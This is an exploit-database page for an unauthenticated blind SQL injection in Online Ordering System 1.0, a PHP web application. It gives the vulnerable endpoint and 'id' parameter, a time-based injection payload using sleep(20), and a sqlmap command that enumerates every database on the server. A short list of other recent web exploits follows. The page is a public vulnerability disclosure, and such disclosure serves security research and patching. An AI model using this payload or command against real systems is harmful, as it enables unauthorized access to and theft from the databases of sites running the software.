Online ordering system 1.0 blind sql injection (unauthenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-03-04 | Type : webapps | Platform : php
This exploit / vulnerability Online ordering system 1.0 blind sql injection (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)
# Date: 2021-03-04
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: v1.0
# Vulnerable endpoint: http://localhost/onlineordering/GPST/admin/design.php?id=9
# Vulnerable Parameter: id

*Steps to Reproduce:*
1) Visit
http://localhost/onlineordering/GPST/admin/design.php?id=12'%20and%20sleep(20)%20and%20'1'='1 and you will see a time delay of 20 Sec in response.
2) Now fire up the following command into SQLMAP.

CMD: sqlmap -u http://localhost/onlineordering/GPST/admin/design.php?id=9
<http://localhost/onlineordering/GPST/admin/design.php?id=9%27%20and%20sleep(20)%20and%20%271%27=%271>*
--batch --dbs

3) Using the above command we will get the name of all the database.

Online ordering system 1.0 blind sql injection (unauthenticated)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Online ordering system 1.0 blind sql injection (unauthenticated) Vulnerability / Exploit